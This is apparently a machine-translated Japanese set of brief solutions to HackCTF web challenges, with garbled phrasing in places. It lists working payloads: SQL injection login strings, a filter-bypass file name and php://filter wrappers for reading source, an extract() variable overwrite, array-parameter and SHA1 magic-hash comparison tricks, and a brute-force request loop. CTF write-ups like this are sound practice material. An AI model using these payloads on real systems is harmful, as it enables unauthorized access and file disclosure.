HACKCTFプールの収集

3570 ワード

1. /


robots.txtを確認します.

2. Hidden

?id=5

3. Button


button=flagでvalue値を変更すればいいです.

4.宝物


和音を編んでできあがった
for i in range(1000,10000):

    url = f"http://ctf.j0n9hyun.xyz:2025/?page={i}"

    res=requests.get(url=url, headers=headers, verify=False)
    if res.text.find("HackCTF") != -1:
        print("find!", i, res.text)
        break

5. Guess me

extract弱点.
filename=flag.変数をtxtにするようにしましょう.
回答:?filename=flag.txt&guess=Nah...

6. Read File


以下のフィルタリングを行っています(ゲーム...)
$command = $_GET['command'];
$command = preg_replace("/flag/" , "" , $command); 
command=flflagag.phpと入力します.
phpパッケージも使用できます.
php://filter/convert.base64-encode/resource=flflagag.php
php://filter/read=string.toupper/resource=flflagag.php

7. Login


id = admin'||1-- gpw=勝手

8.魔法の棒


sha1 magic hash : 10932435112

9. Time


time = 0.6e7sleepではintタイプcastingの過程で小数点が下がるが,実際の実験ではそうではない...みんなはどうしてそんなに分かりやすいのですか.
さらなる研究が必要らしい.先にスキップ

10. Input Check

?text[]=flag
ヒントのある質問